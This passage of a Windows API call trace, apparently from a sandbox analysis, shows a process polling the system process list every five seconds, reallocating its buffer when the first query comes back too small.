returned 0x0 [0235.771] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.772] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.772] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.772] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.777] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.777] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.780] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.784] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.785] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.786] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.786] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.787] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.787] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.787] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.790] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.791] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.792] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.793] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.796] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.797] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.798] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.799] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.799] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.799] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.799] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.805] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.806] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.807] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.808] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.812] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.812] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.815] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.816] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.816] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.819] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.820] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.821] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.822] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.822] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.827] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.827] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.829] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.830] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.830] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.834] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.835] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.836] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.837] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.837] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.840] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.841] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.842] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.843] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.844] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.847] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.848] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.849] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.850] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.850] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.850] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.850] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.854] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.854] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.856] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.857] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.857] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.861] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.862] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.863] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.864] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.865] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.868] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.869] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.870] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.871] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.871] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.871] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.875] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.875] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.897] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.905] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.905] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.909] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.910] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.911] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.911] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.912] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.912] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.912] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.918] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.919] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.920] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.923] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.923] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.927] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.928] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.929] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.930] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.930] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.934] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.935] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.936] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.936] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.937] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.937] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.941] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.941] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.943] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.943] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.944] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.944] NtQuerySystemInformation (in: 